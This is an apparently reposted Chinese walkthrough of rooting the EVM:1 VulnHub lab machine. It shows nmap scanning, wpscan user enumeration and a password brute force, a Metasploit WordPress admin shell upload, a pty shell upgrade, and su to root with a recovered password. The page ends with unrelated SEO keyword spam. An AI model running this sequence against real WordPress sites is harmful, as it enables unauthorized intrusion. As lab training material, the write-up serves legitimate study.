Vulhub-EVM1靶机的使用方法
发表于:2024-11-27 作者:千家信息网编辑
千家信息网最后更新 2024年11月27日,一.环境搭建Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。地址h
千家信息网最后更新 2024年11月27日Vulhub-EVM1靶机的使用方法
一.环境搭建
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
地址
https://www.vulnhub.com/entry/evm-1,391/
下载ova镜像文件,vbox导入,设置两张虚拟网卡,分别为NAT模式和仅主机模式(改为默认网卡配置)
ip为192.168.124.156
二.信息搜集:
(端口扫描)
nmap -A 192.168.124.56Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-16 01:45 ESTNmap scan report for localhost (192.168.124.56)Host is up (0.00035s latency).Not shown: 993 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)| 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)|_ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)| dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works110/tcp open pop3?139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)143/tcp open imap Dovecot imapd|_imap-capabilities: CAPABILITY445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)MAC Address: 00:0C:29:C4:5F:AA (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_clock-skew: mean: 1h49m59s, deviation: 2h63m12s, median: 0s|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: , NetBIOS MAC: (unknown)| smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)| Computer name: ubuntu-extermely-vulnerable-m4ch2ine| NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00| Domain name: \x00| FQDN: ubuntu-extermely-vulnerable-m4ch2ine|_ System time: 2019-12-16T01:48:21-05:00| smb-security-mode: | account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode: | 2.02: |_ Message signing enabled but not required| smb2-time: | date: 2019-12-16 01:48:21|_ start_date: N/A
(目录扫描)
开始使用dirb进行目录扫描dirb http://192.168.124.56/
从目录扫描看出他有wordpress所以先试试之前使用过的工具wpscan
wpscan --url http://192.168.124.56/wordpress/ -e u
成功得到账号c0rrupt3d_brain,现在继续破解他的密码
wpscan --url http://192.168.124.56/wordpress/ -e u -P /chen.txt
成功破解出密码24992499
现在开始使用msfconsole 使用模块
unix/webapp/wp_admin_shell_uploadset RhOSTS 192.168.124.56set USERNAME c0rrupt3d_brainset PassWORD 24992499set targeturi /wordpressrun
直接进入他的家目录之后cd root3r 进来之后发现有一个文件似乎是root密码文件
现在进行查看发现似乎是密码,既然已经知道了密码所以接下来进入交互页面如下图:
shellpython -c "import pty;pty.spawn('/bin/bash')"su root
密码输入为:willy26
成功拿到root
密码
漏洞
目录
成功
文件
模式
网卡
镜像
靶场
安全
接下来
主机
信息
原理
命令
地址
工具
模块
环境
知识
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
软件开发工程师和产品专员
浦东新区市场软件开发诚信合作
数据库 while
在什么学校学软件开发
杭州途特淘网络技术有限公司
福建闽易软件开发
网站服务器证书无效
外文数据库的检索实验报告
浙江做服务器
定位服务器和无线网卡哪个好
关于网络安全的短诗
档案管理与网络安全
金华网络技术员招聘
网络安全泛洪
数据库ISAM译文
循环内查数据库怎么改
苏州安卓软件开发公司
ibm3550服务器线路图
网络安全公司宣传方式
系统管理数据库设置
阿里承接软件开发
什么是企业信息网络技术
登录页面php数据库
肇庆微信软件开发方案
决策树 网络安全 实验
教材选购数据库er图
叫别人租服务器和域名安全吗
软件开发计划书范本
19网络技术班的开学第一课
哈尔滨工程大学学生网络安全守则